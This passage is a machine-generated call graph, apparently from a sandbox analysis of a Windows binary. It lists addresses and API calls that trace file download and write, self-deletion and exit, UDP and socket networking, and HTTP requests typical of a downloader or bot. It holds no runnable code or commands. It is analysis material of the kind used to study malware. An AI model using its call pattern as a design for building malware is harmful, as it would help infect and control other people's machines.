4750 404103 4746->4750 4747->4740 4775 403ca0 4748->4775 4751 40413d 4750->4751 4752 40415e 4750->4752 4785 404680 4751->4785 4754 402820 _invalid_parameter 7 API calls 4752->4754 4755 40416f 4754->4755 4756 402820 _invalid_parameter 7 API calls 4755->4756 4757 40417e 4756->4757 4758 402820 _invalid_parameter 7 API calls 4757->4758 4759 40418d 4758->4759 4760 402820 _invalid_parameter 7 API calls 4759->4760 4761 40419c 4760->4761 4798 403d70 4761->4798 4763 402820 _invalid_parameter 7 API calls 4764 4041ca _invalid_parameter 4763->4764 4764->4763 4765 404284 _invalid_parameter __aligned_recalloc_base 4764->4765 4766 402850 _invalid_parameter 3 API calls 4765->4766 4767 4045a3 _invalid_parameter 4765->4767 4766->4765 4768 402850 _invalid_parameter 3 API calls 4767->4768 4769 4045c9 _invalid_parameter 4767->4769 4768->4767 4770 402850 _invalid_parameter 3 API calls 4769->4770 4771 4045ef _invalid_parameter 4769->4771 4770->4769 4772 402850 _invalid_parameter 3 API calls 4771->4772 4773 404615 _invalid_parameter 4771->4773 4772->4771 4773->4747 4774 402850 _invalid_parameter 3 API calls 4773->4774 4774->4773 4776 403cae 4775->4776 4777 402820 _invalid_parameter 7 API calls 4776->4777 4778 403ccb 4777->4778 4779 402820 _invalid_parameter 7 API calls 4778->4779 4780 403cda _invalid_parameter 4779->4780 4781 402850 _invalid_parameter GetCurrentProcessId HeapValidate RtlFreeHeap 4780->4781 4782 403d3a _invalid_parameter 4780->4782 4781->4780 4783 402850 _invalid_parameter GetCurrentProcessId HeapValidate RtlFreeHeap 4782->4783 4784 403d60 4782->4784 4783->4782 4784->4747 4786 402820 _invalid_parameter 7 API calls 4785->4786 4787 404697 4786->4787 4788 402820 _invalid_parameter 7 API calls 4787->4788 4789 4046a6 4788->4789 4790 402820 _invalid_parameter 7 API calls 4789->4790 4797 4046b5 _invalid_parameter __aligned_recalloc_base 4790->4797 4791 402850 _invalid_parameter GetCurrentProcessId HeapValidate RtlFreeHeap 4791->4797 4792 404841 _invalid_parameter 4793 402850 _invalid_parameter GetCurrentProcessId HeapValidate RtlFreeHeap 4792->4793 4794 404867 _invalid_parameter 4792->4794 4793->4792 4795 402850 _invalid_parameter GetCurrentProcessId HeapValidate RtlFreeHeap 4794->4795 4796 40488d 4794->4796 4795->4794 4796->4747 4797->4791 4797->4792 4799 402820 _invalid_parameter 7 API calls 4798->4799 4800 403d7f _invalid_parameter 4799->4800 4801 403ca0 _invalid_parameter 9 API calls 4800->4801 4803 403db8 _invalid_parameter 4801->4803 4802 402850 _invalid_parameter GetCurrentProcessId HeapValidate RtlFreeHeap 4802->4803 4803->4802 4804 403de3 4803->4804 4804->4764 4806 409d22 4805->4806 4809 409c70 4806->4809 4810 409fa0 _invalid_parameter 7 API calls 4809->4810 4811 409c80 4810->4811 4813 409cbc 4811->4813 4816 407b0f 4811->4816 4818 4091a0 4811->4818 4825 409790 4811->4825 4830 409b60 4811->4830 4815 40a1b0 __aligned_recalloc_base 3 API calls 4813->4815 4815->4816 4816->4670 4819 4091a9 4818->4819 4820 4091b3 4818->4820 4819->4811 4820->4819 4821 4091f6 memset 4820->4821 4821->4819 4822 409217 4821->4822 4822->4819 4823 40921d memcpy 4822->4823 4838 408f70 4823->4838 4826 40979d 4825->4826 4827 4097a7 4825->4827 4826->4811 4827->4826 4828 40989f memcpy 4827->4828 4843 4094c0 4827->4843 4828->4827 4831 409b6c 4830->4831 4833 409b76 4830->4833 4831->4811 4832 4094c0 64 API calls 4834 409bf7 4832->4834 4833->4831 4833->4832 4834->4831 4835 408f70 6 API calls 4834->4835 4836 409c16 4835->4836 4836->4831 4837 409c2b memcpy 4836->4837 4837->4831 4839 408fbe 4838->4839 4841 408f7e 4838->4841 4839->4819 4841->4839 4842 408eb0 6 API calls 4841->4842 4842->4841 4844 4094d0 4843->4844 4846 4094da 4843->4846 4844->4827 4846->4844 4853 409300 4846->4853 4848 409618 memcpy 4848->4844 4850 409637 memcpy 4851 409761 4850->4851 4852 4094c0 62 API calls 4851->4852 4852->4844 4854 40930d 4853->4854 4855 409317 4853->4855 4854->4844 4854->4848 4854->4850 4855->4854 4856 4093a0 4855->4856 4857 4093a5 4855->4857 4858 409388 4855->4858 4864 408c60 4856->4864 4861 408f70 6 API calls 4857->4861 4860 408f70 6 API calls 4858->4860 4860->4856 4861->4856 4863 40944c memset 4863->4854 4865 408c79 4864->4865 4870 408c6f 4864->4870 4866 408b30 9 API calls 4865->4866 4865->4870 4867 408d72 4866->4867 4868 409fa0 _invalid_parameter 7 API calls 4867->4868 4869 408dc1 4868->4869 4869->4870 4871 4089a0 46 API calls 4869->4871 4870->4854 4870->4863 4872 408dee 4871->4872 4873 40a1b0 __aligned_recalloc_base GetCurrentProcessId HeapValidate RtlFreeHeap 4872->4873 4873->4870 4893 409e50 GetCurrentProcessId 4874->4893 4876 409feb 4877 409e70 _invalid_parameter 5 API calls 4876->4877 4878 409ff7 _invalid_parameter 4876->4878 4877->4878 4879 40a0f0 __aligned_recalloc_base HeapValidate 4878->4879 4880 40a0a0 HeapAlloc 4878->4880 4881 40a06a HeapReAlloc 4878->4881 4882 40a1b0 __aligned_recalloc_base 3 API calls 4878->4882 4883 405d15 4878->4883 4879->4878 4880->4878 4881->4878 4882->4878 4883->4654 4883->4659 4887 40c19b 4884->4887 4885 409fa0 _invalid_parameter 7 API calls 4885->4887 4886 405dad 4886->4659 4888 407310 4886->4888 4887->4885 4887->4886 4889 409fa0 _invalid_parameter 7 API calls 4888->4889 4890 407320 4889->4890 4891 407367 4890->4891 4892 40732c memcpy CreateThread 4890->4892 4891->4659 4892->4891 4894 407370 GetTickCount srand rand Sleep 4892->4894 4893->4876 4895 4073fd 4894->4895 4901 4073a7 4894->4901 4896 4073fb 4895->4896 4897 40eae0 56 API calls 4895->4897 4898 40a1b0 __aligned_recalloc_base 3 API calls 4896->4898 4897->4896 4900 407428 4898->4900 4899 4073b6 StrChrA 4899->4901 4901->4896 4901->4899 4904 40eae0 9 API calls 4901->4904 4905 40ed03 InternetCloseHandle Sleep 4904->4905 4906 40eba3 InternetOpenUrlW 4904->4906 4907 4073e5 Sleep 4905->4907 4908 40ed2a 6 API calls 4905->4908 4909 40ebd2 CreateFileW 4906->4909 4910 40ecf6 InternetCloseHandle 4906->4910 4907->4901 4908->4907 4911 40eda6 wsprintfW DeleteFileW 4908->4911 4912 40ec01 InternetReadFile 4909->4912 4931 40ecd3 4909->4931 4910->4905 4913 40e7c0 18 API calls 4911->4913 4914 40ec54 wsprintfW DeleteFileW 4912->4914 4915 40ec25 4912->4915 4917 40eddb 4913->4917 4933 40e7c0 CreateFileW 4914->4933 4915->4914 4916 40ec2e WriteFile 4915->4916 4916->4912 4919 40ede5 Sleep 4917->4919 4920 40ee19 DeleteFileW 4917->4920 4922 40e980 6 API calls 4919->4922 4920->4907 4924 40edfc 4922->4924 4927 40ee17 4924->4927 4929 40ee0f ExitProcess 4924->4929 4925 40eca0 Sleep 4928 40e980 6 API calls 4925->4928 4926 40ecdc DeleteFileW 4926->4931 4927->4907 4930 40ecb7 4928->4930 4930->4931 4932 40eccb ExitProcess 4930->4932 4931->4910 4934 40e805 CreateFileMappingW 4933->4934 4938 40e906 4933->4938 4935 40e826 MapViewOfFile 4934->4935 4934->4938 4937 40e845 GetFileSize 4935->4937 4935->4938 4936 40e920 CreateFileW 4939 40e942 WriteFile 4936->4939 4940 40e968 4936->4940 4942 40e861 4937->4942 4943 40e8fc UnmapViewOfFile 4937->4943 4938->4936 4944 40e971 4938->4944 4939->4940 4941 40a1b0 __aligned_recalloc_base 3 API calls 4940->4941 4941->4944 4953 40c7f0 4942->4953 4943->4938 4944->4925 4944->4926 4947 40c190 7 API calls 4948 40e8b0 4947->4948 4948->4943 4949 40e8cd memcmp 4948->4949 4949->4943 4950 40e8e9 4949->4950 4951 40a1b0 __aligned_recalloc_base 3 API calls 4950->4951 4952 40e8f2 4951->4952 4952->4943 4954 40c220 10 API calls 4953->4954 4955 40c814 4954->4955 4955->4943 4955->4947 4957 40d73d htons inet_addr setsockopt 4956->4957 4963 40d86e 4956->4963 4958 40aa80 8 API calls 4957->4958 4959 40d7b6 bind lstrlenA sendto ioctlsocket 4958->4959 4964 40d80b 4959->4964 4960 40d832 5013 40ab40 shutdown closesocket 4960->5013 4963->4435 4964->4960 4965 409fe0 9 API calls 4964->4965 5004 40d890 4964->5004 4965->4964 5020 40dbc0 memset InternetCrackUrlA InternetOpenA 4966->5020 4969 40da9e 4969->4435 4971 40a1b0 __aligned_recalloc_base 3 API calls 4971->4969 4975 40da6b 4975->4971 4977 40da61 SysFreeString 4977->4975 5127 40aa40 inet_addr 4981->5127 4984 40aadc connect 4985 40aaf0 getsockname 4984->4985 4986 40ab24 4984->4986 4985->4986 5130 40ab40 shutdown closesocket 4986->5130 4988 40ab2d 4989 40e470 4988->4989 5131 40aa20 inet_ntoa 4989->5131 4991 40e486 4992 40c9f0 11 API calls 4991->4992 4993 40e4a5 4992->4993 4994 40d6cc 4993->4994 5132 40e4f0 memset InternetCrackUrlA InternetOpenA 4993->5132 4994->4440 4997 40e4dc 4999 40a1b0 __aligned_recalloc_base 3 API calls 4997->4999 4998 40a1b0 __aligned_recalloc_base 3 API calls 4998->4997 4999->4994 5001 40a2d4 5000->5001 5002 40a2da 5001->5002 5003 40a1b0 GetCurrentProcessId HeapValidate RtlFreeHeap __aligned_recalloc_base 5001->5003 5002->4431 5003->5001 5005 40d8ac 5004->5005 5006 40d974 5005->5006 5007 40d8c8 recvfrom 5005->5007 5006->4964 5008 40d8f6 StrCmpNIA 5007->5008 5009 40d8e9 Sleep 5007->5009 5008->5005 5010 40d915 StrStrIA 5008->5010 5009->5005 5010->5005 5011 40d936 StrChrA 5010->5011 5014 40c8a0 5011->5014 5013->4963 5018 40c8ab 5014->5018 5015 40c8b1 lstrlenA 5017 40c8c4 5015->5017 5015->5018 5016 409fa0 _invalid_parameter 7 API calls 5016->5018 5017->5005 5018->5015 5018->5016 5018->5017 5019 40c8e0 memcpy 5018->5019 5019->5017 5019->5018 5021 40dc61 InternetConnectA 5020->5021 5022 40d99a 5020->5022 5023 40ddca InternetCloseHandle 5021->5023 5024 40dc9a HttpOpenRequestA 5021->5024 5022->4969 5033 40dab0 5022->5033 5023->5022 5025 40dcd0 HttpSendRequestA 5024->5025 5026 40ddbd InternetCloseHandle 5024->5026 5027 40ddb0 InternetCloseHandle 5025->5027 5029 40dced 5025->5029 5026->5023 5027->5026 5028 40dd0e InternetReadFile 5028->5029 5030 40dd3b 5028->5030 5029->5028 5029->5030 5031 409fe0 9 API calls 5029->5031 5030->5027 5032 40dd56 memcpy 5031->5032 5032->5029 5062 405690 5033->5062 5036 40dada SysAllocString 5037 40daf1 CoCreateInstance 5036->5037 5038 40dba7 5036->5038 5039 40db9d SysFreeString 5037->5039 5042 40db16 5037->5042 5040 40a1b0 __aligned_recalloc_base 3 API calls 5038->5040 5039->5038 5041 40d9b3 5040->5041 5041->4975 5043 40e420 5041->5043 5042->5039 5079 40df70 5043->5079 5046 40ddf0 5084 40e240 5046->5084 5051 40e3a0 6 API calls 5052 40de47 5051->5052 5058 40da32 5052->5058 5101 40e060 5052->5101 5055 40de7f 5055->5058 5106 40df10 5055->5106 5056 40e060 6 API calls 5056->5055 5058->4977 5059 40c9f0 5058->5059 5122 40c960 5059->5122 5067 40569d 5062->5067 5063 4056a3 lstrlenA 5063->5067 5068 4056b6 5063->5068 5065 409fa0 _invalid_parameter 7 API calls 5065->5067 5067->5063 5067->5065 5067->5068 5069 40a1b0 __aligned_recalloc_base 3 API calls 5067->5069 5070 405630 5067->5070 5074 4055e0 5067->5074 5068->5036 5068->5041 5069->5067 5071 405647 MultiByteToWideChar 5070->5071 5072 40563a lstrlenA 5070->5072 5073 40566c 5071->5073 5072->5071 5073->5067 5075 4055eb 5074->5075 5076 4055f1 lstrlenA 5075->5076 5077 405630 2 API calls 5075->5077 5078 405627 5075->5078 5076->5075 5077->5075 5078->5067 5082 40df96 5079->5082 5080 40da1d 5080->4975 5080->5046 5081 40e013 lstrcmpiW 5081->5082 5083 40e02b SysFreeString 5081->5083 5082->5080 5082->5081 5082->5083 5083->5082 5086 40e266 5084->5086 5085 40de0b 5085->5058 5096 40e3a0 5085->5096 5086->5085 5087 40e2f3 lstrcmpiW 5086->5087 5088 40e373 SysFreeString 5087->5088 5089 40e306 5087->5089 5088->5085 5090 40df10 2 API calls 5089->5090 5092 40e314 5090->5092 5091 40e365 5091->5088 5092->5088 5092->5091 5093 40e343 lstrcmpiW 5092->5093 5094 40e355 5093->5094 5095 40e35b SysFreeString 5093->5095 5094->5095 5095->5091 5097 40df10 2 API calls 5096->5097 5098 40e3bb 5097->5098 5099 40e240 6 API calls 5098->5099 5100 40de29 5098->5100 5099->5100 5100->5051 5100->5058 5102 40df10 2 API calls 5101->5102 5103 40e07b 5102->5103 5105 40de65 5103->5105 5110 40e0e0 5103->5110 5105->5055 5105->5056 5107 40df36 5106->5107 5108 40df4d 5107->5108 5109 40df70 2 API calls 5107->5109 5108->5058 5109->5108 5112 40e106 5110->5112 5111 40e21d 5111->5105 5112->5111 5113 40e193 lstrcmpiW 5112->5113 5114 40e213 SysFreeString 5113->5114 5115 40e1a6 5113->5115 5114->5111 5116 40df10 2 API calls 5115->5116 5117 40e1b4 5116->5117 5117->5114 5118 40e205 5117->5118 5119 40e1e3 lstrcmpiW 5117->5119 5118->5114 5120 40e1f5 5119->5120 5121 40e1fb SysFreeString 5119->5121 5120->5121 5121->5118 5125 40c96d 5122->5125 5123 40c910 _vscprintf wvsprintfA 5123->5125 5124 409fe0 9 API calls 5124->5125 5125->5123 5125->5124 5126 40c988 SysFreeString 5125->5126 5126->4977 5128 40aa6c socket 5127->5128 5129 40aa59 gethostbyname 5127->5129 5128->4984 5128->4988 5129->5128 5130->4988 5131->4991 5133 40e4c7 5132->5133 5134 40e594 InternetConnectA 5132->5134 5133->4997 5133->4998 5135 40e714 InternetCloseHandle 5134->5135 5136 40e5cd HttpOpenRequestA 5134->5136 5135->5133 5137 40e603 HttpAddRequestHeadersA HttpSendRequestA 5136->5137 5138 40e707 InternetCloseHandle 5136->5138 5139 40e6fa InternetCloseHandle 5137->5139 5142 40e64d 5137->5142 5138->5135 5139->5138 5140 40e664 InternetReadFile 5141 40e691 5140->5141 5140->5142 5141->5139 5142->5140 5142->5141 5143 409fe0 9 API calls 5142->5143 5144 40e6ac memcpy 5143->5144 5144->5142 5151 407067 5145->5151 5146 4072c0 CoCreateInstance 5146->5151 5147 40723b 5149 407244 SysFreeString 5147->5149 5150 40700b SysFreeString 5147->5150 5148 40a1b0 __aligned_recalloc_base 3 API calls 5148->5147 5149->5150 5150->4444 5151->5146 5152 4071b6 SysAllocString 5151->5152 5153 407082 5151->5153 5152->5151 5152->5153 5153->5147 5153->5148 5155 40beca 5154->5155 5156 40bece 5154->5156 5155->4450 5158 40be80 CryptAcquireContextW 5156->5158 5159 40bebb 5158->5159 5160 40be9d CryptGenRandom CryptReleaseContext 5158->5160 5159->5155 5160->5159 5161->4468 5213 40add0 gethostname 5162->5213 5165 40aeb9 5165->4468 5167 40aecc strcmp 5167->5165 5168 40aee1 5167->5168 5217 40aa20 inet_ntoa 5168->5217 5170 40aeef strstr 5171 40af40 5170->5171 5172 40aeff 5170->5172 5218 40aa20 inet_ntoa 5171->5218 5220 40aa20 inet_ntoa 5172->5220 5175 40af0d strstr 5175->5165 5177 40af1d 5175->5177 5176 40af4e strstr 5178 40af5e 5176->5178 5179 40af9f 5176->5179 5221 40aa20 inet_ntoa 5177->5221 5222 40aa20 inet_ntoa 5178->5222 5219 40aa20 inet_ntoa 5179->5219 5183 40af6c strstr 5183->5165 5186 40af7c 5183->5186 5184 40afad strstr 5187 40afbd 5184->5187 5188 40affe EnterCriticalSection 5184->5188 5185 40af2b strstr 5185->5165 5185->5171 5223 40aa20 inet_ntoa 5186->5223 5224 40aa20 inet_ntoa 5187->5224 5189 40b016 5188->5189 5198 40b041 5189->5198 5226 40d4a0 NtQuerySystemTime RtlTimeToSecondsSince1980 5189->5226 5192 40af8a strstr 5192->5165 5192->5179 5193 40afcb strstr 5193->5165 5194 40afdb 5193->5194 5225 40aa20 inet_ntoa 5194->5225 5197 40b13a LeaveCriticalSection 5197->5165 5198->5197 5200 409d90 7 API calls 5198->5200 5199 40afe9 strstr 5199->5165 5199->5188 5201 40b085 5200->5201 5201->5197 5227 40d4a0 NtQuerySystemTime RtlTimeToSecondsSince1980 5201->5227 5203 40b0a3 5204 40b0d0 5203->5204 5205 40b0c6 Sleep 5203->5205 5207 40b0f5 5203->5207 5206 40a1b0 __aligned_recalloc_base 3 API calls 5204->5206 5205->5203 5206->5207 5207->5197 5228 40ab80 5207->5228 5210 40ab80 13 API calls 5209->5210 5211 40ab73 LeaveCriticalSection 5210->5211 5211->4470 5212->4476 5214 40adf7 gethostbyname 5213->5214 5215 40ae13 5213->5215 5214->5215 5215->5165 5216 40aa20 inet_ntoa 5215->5216 5216->5167 5217->5170 5218->5176 5219->5184 5220->5175 5221->5185 5222->5183 5223->5192 5224->5193 5225->5199 5226->5198 5227->5203 5229 40ab94 5228->5229 5236 40ab8f 5228->5236 5230 409fa0 _invalid_parameter 7 API calls 5229->5230 5232 40aba8 5230->5232 5231 40ac04 CreateFileW 5233 40ac53 InterlockedExchange 5231->5233 5234 40ac27 WriteFile FlushFileBuffers 5231->5234 5232->5231 5232->5236 5235 40a1b0 __aligned_recalloc_base 3 API calls 5233->5235 5234->5233 5235->5236 5236->5197 5240 40d25d 5237->5240 5238 40d193 5238->4483 5238->4484 5239 40d281 WaitForSingleObject 5239->5240 5240->5238 5240->5239 5306 4013b0 5241->5306 5243 40d55d 5245 40d577 InterlockedExchangeAdd 5243->5245 5246 40d5bb WaitForSingleObject 5243->5246 5250 40d5dd 5243->5250 5318 40b200 EnterCriticalSection 5243->5318 5323 40b520 5243->5323 5245->5243 5245->5246 5246->5243 5247 40d5d4 5246->5247 5326 401330 5247->5326 5252 401f92 5251->5252 5257 402008 5251->5257 5253 401f97 WSAGetOverlappedResult 5252->5253 5405 401d60 5252->5405 5253->5252 5254 401fb9 WSAGetLastError 5253->5254 5254->5252 5256 401fd3 GetQueuedCompletionStatus 5256->5252 5256->5257 5446 401470 5258->5446 5260 40d604 5261 40d62f 5260->5261 5262 40d615 WaitForSingleObject 5260->5262 5263 401330 7 API calls 5262->5263 5263->5261 5460 4021b0 5264->5460 5267 40cf42 5268 40cf25 WaitForSingleObject 5464 401600 5268->5464 5272 40b423 WaitForSingleObject 5271->5272 5273 40b451 5272->5273 5274 40b43b InterlockedDecrement 5272->5274 5275 40b44a 5274->5275 5275->5272 5276 40ab60 15 API calls 5275->5276 5276->5275 5278 401ac9 5277->5278 5279 40194d WSAWaitForMultipleEvents 5277->5279 5280 4019f0 GetTickCount 5279->5280 5281 40196a WSAEnumNetworkEvents 5279->5281 5282 401a43 GetTickCount 5280->5282 5283 401a05 EnterCriticalSection 5280->5283 5281->5280 5297 401983 5281->5297 5284 401ab5 WaitForSingleObject 5282->5284 5285 401a4e EnterCriticalSection 5282->5285 5286 401a3a LeaveCriticalSection 5283->5286 5290 401a16 5283->5290 5284->5278 5284->5279 5288 401aa1 LeaveCriticalSection GetTickCount 5285->5288 5289 401a5f InterlockedExchangeAdd 5285->5289 5286->5284 5287 401992 accept 5287->5280 5287->5297 5288->5284 5546 40d4a0 NtQuerySystemTime RtlTimeToSecondsSince1980 5289->5546 5293 401a29 LeaveCriticalSection 5290->5293 5528 401820 5290->5528 5293->5284 5295 401a72 5295->5288 5295->5289 5547 40ab40 shutdown closesocket 5295->5547 5297->5280 5297->5287 5298 4019e9 5297->5298 5508 4022c0 5297->5508 5299 401cf0 7 API calls 5298->5299 5299->5280 5302 40ceb4 5300->5302 5301 40b200 5 API calls 5301->5302 5302->5301 5303 40ced0 WaitForSingleObject 5302->5303 5305 40cef5 5302->5305 5561 40cad0 InterlockedExchangeAdd 5302->5561 5303->5302 5303->5305 5307 409d90 7 API calls 5306->5307 5308 4013bb CreateEventA socket 5307->5308 5309 4013f2 5308->5309 5310 4013f8 5308->5310 5311 401330 7 API calls 5309->5311 5312 401401 bind 5310->5312 5313 401462 5310->5313 5311->5310 5314 401444 CreateThread 5312->5314 5315 401434 5312->5315 5313->5243 5314->5313 5336 401100 5314->5336 5316 401330 7 API calls 5315->5316 5317 40143a 5316->5317 5317->5243 5319 40b237 LeaveCriticalSection 5318->5319 5320 40b21f 5318->5320 5319->5243 5321 40bec0 3 API calls 5320->5321 5322 40b22a 5321->5322 5322->5319 5365 40b480 5323->5365 5327 401339 5326->5327 5335 40139b 5326->5335 5328 401341 SetEvent WaitForSingleObject 5327->5328 5327->5335 5333 401362 5328->5333 5329 40138b 5404 40ab40 shutdown closesocket 5329->5404 5331 40a1b0 GetCurrentProcessId HeapValidate RtlFreeHeap __aligned_recalloc_base 5331->5333 5332 401395 5334 40a1b0 __aligned_recalloc_base 3 API calls 5332->5334 5333->5329 5333->5331 5334->5335 5335->5250 5337 401115 ioctlsocket 5336->5337 5338 4011e4 5337->5338 5340 40113a 5337->5340 5339 40a1b0 __aligned_recalloc_base 3 API calls 5338->5339 5342 4011ea 5339->5342 5341 4011cd WaitForSingleObject 5340->5341 5343 409fe0 9 API calls 5340->5343 5344 401168 recvfrom 5340->5344 5345 4011ad InterlockedExchangeAdd 5340->5345 5341->5337 5341->5338 5343->5340 5344->5340 5344->5341 5347 401000 5345->5347 5348 401014 5347->5348 5349 40103b 5348->5349 5350 409d90 7 API calls 5348->5350 5358 40d4a0 NtQuerySystemTime RtlTimeToSecondsSince1980 5349->5358 5350->5349 5352 40105b 5359 401580 5352->5359 5354 4010ec 5354->5340 5355 4010a3 IsBadReadPtr 5357 401071 5355->5357 5356 4010d8 memmove 5356->5357 5357->5354 5357->5355 5357->5356 5358->5352 5360 401592 5359->5360 5361 4015a5 memcpy 5359->5361 5362 409fe0 9 API calls 5360->5362 5364 4015c1 5361->5364 5363 40159f 5362->5363 5363->5361 5364->5357 5366 40bf00 3 API calls 5365->5366 5367 40b48b 5366->5367 5368 40b4a7 lstrlenA 5367->5368 5369 40c190 7 API calls 5368->5369 5370 40b4dd 5369->5370 5371 40b508 5370->5371 5376 40d520 5370->5376 5379 40cc30 5370->5379 5371->5243 5372 40b4fc 5373 40a1b0 __aligned_recalloc_base 3 API calls 5372->5373 5373->5371 5384 401200 5376->5384 5378 40d542 5378->5372 5400 40cc90 5379->5400 5382 40cc5e 5382->5372 5383 40cc90 send 5383->5382 5385 401314 5384->5385 5386 40121d 5384->5386 5385->5378 5386->5385 5387 409fa0 _invalid_parameter 7 API calls 5386->5387 5388 401247 memcpy htons 5387->5388 5389 4012ed 5388->5389 5390 401297 sendto 5388->5390 5393 40a1b0 __aligned_recalloc_base 3 API calls 5389->5393 5391 4012b6 InterlockedExchangeAdd 5390->5391 5392 4012e9 5390->5392 5391->5390 5394 4012cc 5391->5394 5392->5389 5395 40130a 5392->5395 5396 4012fc 5393->5396 5398 40a1b0 __aligned_recalloc_base 3 API calls 5394->5398 5397 40a1b0 __aligned_recalloc_base 3 API calls 5395->5397 5396->5378 5397->5385 5399 4012db 5398->5399 5399->5378 5401 40cca1 send 5400->5401 5402 40cc43 5401->5402 5403 40ccbe 5401->5403 5402->5382 5402->5383 5403->5401 5403->5402 5404->5332 5406 401ef2 InterlockedDecrement setsockopt closesocket 5405->5406 5407 401d74 5405->5407 5424 401e39 5406->5424 5407->5406 5408 401d7c 5407->5408 5425 40d4a0 NtQuerySystemTime RtlTimeToSecondsSince1980 5408->5425 5410 401d81 InterlockedExchange 5411 401d98 5410->5411 5412 401e4e 5410->5412 5417 401da9 InterlockedDecrement 5411->5417 5418 401dbc InterlockedDecrement InterlockedExchangeAdd 5411->5418 5411->5424 5413 401e67 5412->5413 5414 401e57 InterlockedDecrement 5412->5414 5415 401e72 5413->5415 5416 401e87 InterlockedDecrement 5413->5416 5414->5256 5434 401ae0 WSASend 5415->5434 5420 401ee9 5416->5420 5417->5256 5421 401e2f 5418->5421 5420->5256 5426 401cf0 5421->5426 5422 401e7e 5422->5256 5424->5256 5425->5410 5427 401d00 InterlockedExchangeAdd 5426->5427 5428 401cfc 5426->5428 5429 401d53 5427->5429 5430 401d17 InterlockedIncrement 5427->5430 5428->5424 5429->5424 5440 401c50 WSARecv 5430->5440 5432 401d46 5432->5429 5433 401d4c InterlockedDecrement 5432->5433 5433->5429 5435 401b50 5434->5435 5436 401b12 WSAGetLastError 5434->5436 5435->5422 5436->5435 5437 401b1f 5436->5437 5438 401b56 5437->5438 5439 401b26 Sleep WSASend 5437->5439 5438->5422 5439->5435 5439->5436 5441 401cd2 5440->5441 5442 401c8e 5440->5442 5441->5432 5443 401c90 WSAGetLastError 5442->5443 5444 401ca4 Sleep WSARecv 5442->5444 5445 401cdb 5442->5445 5443->5441 5443->5442 5444->5441 5444->5443 5445->5432 5447 401483 5446->5447 5448 401572 5446->5448 5447->5448 5449 409d90 7 API calls 5447->5449 5448->5260 5450 401498 CreateEventA socket 5449->5450 5451 4014cf 5450->5451 5454 4014d5 5450->5454 5452 401330 7 API calls 5451->5452 5452->5454 5453 4014e2 htons setsockopt bind 5455 401546 5453->5455 5456 401558 CreateThread 5453->5456 5454->5448 5454->5453 5457 401330 7 API calls 5455->5457 5456->5448 5459 401100 20 API calls __aligned_recalloc_base 5456->5459 5458 40154c 5457->5458 5458->5260 5461 4021cf 5460->5461 5462 4021bb 5460->5462 5461->5267 5461->5268 5462->5461 5485 402020 5462->5485 5465 40160d 5464->5465 5484 401737 5464->5484 5466 401619 EnterCriticalSection 5465->5466 5465->5484 5467 4016b5 LeaveCriticalSection SetEvent 5466->5467 5470 401630 5466->5470 5468 4016d0 5467->5468 5469 4016e8 5467->5469 5471 4016d6 PostQueuedCompletionStatus 5468->5471 5472 40d2d0 11 API calls 5469->5472 5470->5467 5473 401641 InterlockedDecrement 5470->5473 5475 40165a InterlockedExchangeAdd 5470->5475 5481 4016a0 InterlockedDecrement 5470->5481 5471->5469 5471->5471 5474 4016f3 5472->5474 5473->5470 5476 40d410 6 API calls 5474->5476 5475->5470 5477 40166d InterlockedIncrement 5475->5477 5478 4016fc CloseHandle CloseHandle WSACloseEvent 5476->5478 5479 401c50 4 API calls 5477->5479 5507 40ab40 shutdown closesocket 5478->5507 5479->5470 5481->5470 5482 401724 DeleteCriticalSection 5483 40a1b0 __aligned_recalloc_base 3 API calls 5482->5483 5483->5484 5484->5267 5486 409d90 7 API calls 5485->5486 5487 40202b 5486->5487 5488 402038 GetSystemInfo InitializeCriticalSection CreateEventA 5487->5488 5489 4021aa 5487->5489 5490 402076 CreateIoCompletionPort 5488->5490 5491 40219f 5488->5491 5489->5461 5490->5491 5492 40208f 5490->5492 5493 401600 35 API calls 5491->5493 5494 40d130 8 API calls 5492->5494 5495 4021a5 5493->5495 5496 402094 5494->5496 5495->5489 5496->5491 5497 40209f WSASocketA 5496->5497 5497->5491 5498 4020bd setsockopt htons bind 5497->5498 5498->5491 5499 402126 listen 5498->5499 5499->5491 5500 40213a WSACreateEvent 5499->5500 5500->5491 5501 402147 WSAEventSelect 5500->5501 5501->5491 5502 402159 5501->5502 5503 40217f 5502->5503 5504 40d160 317 API calls 5502->5504 5505 40d160 317 API calls 5503->5505 5504->5502 5506 402194 5505->5506 5506->5461 5507->5482 5509 4022d2 EnterCriticalSection 5508->5509 5510 4022cd 5508->5510 5511 4022fd LeaveCriticalSection 5509->5511 5514 4022e7 5509->5514 5510->5297 5512 402308 5511->5512 5513 40230f 5511->5513 5512->5297 5515 409d90 7 API calls 5513->5515 5514->5511 5516 402319 5515->5516 5517 402326 getpeername CreateIoCompletionPort 5516->5517 5518 4023b8 5516->5518 5520 4023b2 5517->5520 5521 402366 5517->5521 5550 40ab40 shutdown closesocket 5518->5550 5524 40a1b0 __aligned_recalloc_base 3 API calls 5520->5524 5548 40d4a0 NtQuerySystemTime RtlTimeToSecondsSince1980 5521->5548 5522 4023c3 5522->5297 5524->5518 5525 40236b InterlockedExchange InitializeCriticalSection InterlockedIncrement 5549 4021e0 EnterCriticalSection LeaveCriticalSection 5525->5549 5527 4023ab 5527->5297 5529 401830 5528->5529 5537 40190f 5528->5537 5530 40183d InterlockedExchangeAdd 5529->5530 5529->5537 5531 401854 5530->5531 5530->5537 5532 401880 5531->5532 5531->5537 5551 4017a0 EnterCriticalSection 5531->5551 5533 401891 5532->5533 5560 40ab40 shutdown closesocket 5532->5560 5536 4018a7 InterlockedDecrement 5533->5536 5538 401901 5533->5538 5536->5538 5537->5286 5539 402247 5538->5539 5540 402265 EnterCriticalSection 5538->5540 5539->5286 5541 40229c LeaveCriticalSection DeleteCriticalSection 5540->5541 5544 40227d 5540->5544 5542 40a1b0 __aligned_recalloc_base 3 API calls 5541->5542 5542->5539 5543 40a1b0 GetCurrentProcessId HeapValidate RtlFreeHeap __aligned_recalloc_base 5543->5544 5544->5543 5545 40229b 5544->5545 5545->5541 5546->5295 5547->5295 5548->5525 5549->5527 5550->5522 5552 401807 LeaveCriticalSection 5551->5552 5553 4017ba InterlockedExchangeAdd 5551->5553 5552->5531 5554 4017ca LeaveCriticalSection 5553->5554 5555 4017d9 5553->5555 5554->5531 5556 40a1b0 __aligned_recalloc_base 3 API calls 5555->5556 5557 4017fe 5556->5557 5558 40a1b0 __aligned_recalloc_base 3 API calls 5557->5558 5559 401804 5558->5559 5559->5552 5560->5533 5562 40caed 5561->5562 5572 40cae6 5561->5572 5578 40cdc0 5562->5578 5565 40cb0d InterlockedIncrement 5575 40cb17 5565->5575 5566 40b520 18 API calls 5566->5575 